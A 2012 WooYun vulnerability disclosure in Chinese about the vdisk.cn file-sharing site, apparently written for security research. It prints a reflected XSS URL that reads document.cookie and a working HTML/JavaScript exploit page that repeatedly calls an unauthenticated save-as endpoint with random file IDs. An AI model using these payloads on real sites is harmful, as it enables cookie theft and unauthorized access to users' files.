威盘任意下载+非持久XSS | wooyun-2012-08003| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-08003

漏洞标题：威盘任意下载+非持久XSS

漏洞作者：小四

提交时间：2012-06-07 17:18

修复时间：2012-07-22 17:19

公开时间：2012-07-22 17:19

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-06-07：积极联系厂商并且等待厂商认领中，细节不对外公开
2012-07-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

威盘可以让用户在不注册(系统自动创建用户)的情况下上传文件，无容量限制，而且方便下载，被很多人使用。

详细说明：

1.XSS：威盘有个搜索功能，发现了典型的form xss。
http://www.vdisk.cn/tempuser1334906450?s=%22+onmouseover%3Djavascript%3Aalert%28document.cookie%29%3E
2.任意收藏下载：
威盘的每个文件是这样编号的：http://www.vdisk.cn/down/index/10016545，点击进入，等10秒广告(不想等待的话，清空地址栏输入javascript:document.getElementById('loadingbox').style.display='none'; document.getElementById('btnbox').style.display='block';)会出现下载地址，有个另存为我的网盘，然后就保存了，如果弹出你没有威盘账号，好办，随便上传一个文件，威盘自动为你分配一个账号，如tempuser1334905592，我是从下面的代码里看到的

var loadcount = 1;
        function saveas(id) {
                if(jQuery.cookie('uid')==null) {
                        alert('您还没有登录,请点击右上角登录或免费注册.');
                }
                else {
                        $.ajaxSetup({async : true, cache : false, type: "GET"});
                        $.getJSON('/json/saveas?id=' + id, '' , 
                        function(json){
                                if(json.result != true) { alert(json.msg); }
                                else { if(confirm("文件复制另存成功,是否现在去你的威盘看看?")) location = '/user/admin/' + jQuery.cookie('userid'); }
                        });
                }
        }
        $().ready(function(){
                setTimeout("document.getElementById('loadingbox').style.display='none'; document.getElementById('btnbox').style.display='block'; ", 10000);
        });

另存为是一个saveas(id)函数。现在你打开这个地址http://www.vdisk.cn/json/saveas?id=' id' (saveas函数的核心)，它通过异步的方式在后台把这个id添加到你的账户里。这也是任意收藏的前提，好了写个工具，间隔打开这个链接，后面的id是7-8位的数字组合，经测试最小为3440540,最大至少为10018135，这样一会儿你的临时临时账户里就会是威盘所有(?)文件的信息了，所谓任意收藏。
利用代码：

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>威盘任意收藏</title>
<style type="text/css">
<!--
body,td,th {
        font-size: 24px;
        color: #FF6;
}
body {
        background-color: #366;
        margin-left: 20px;
        margin-top: 20px;
        margin-right: 20px;
        margin-bottom: 20px;
}
a{ color:#FFF}
-->
</style></head>
<body>
<script>
var s='';
function shua(){
setTimeout("shua()",1000);
s="http://www.vdisk.cn/json/saveas?id="+eval(Math.round(Math.random()*6577595)+3440540);
document.getElementById("my").src=s;
document.getElementById("t").innerHTML="<a href="+s+">"+s+"</a><br /><br />"
}
shua();
</script>
<p>
收藏：<span id="t"></span>
</p>
<iframe id="my" width="80%"></iframe>
</body>
</html>

通过任意收藏测试效果：
http://www.vdisk.cn/tempuser1334839579

漏洞证明：

修复方案：

设置权限。不然服务器会被刷爆的。

版权声明：转载请注明来源小四@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝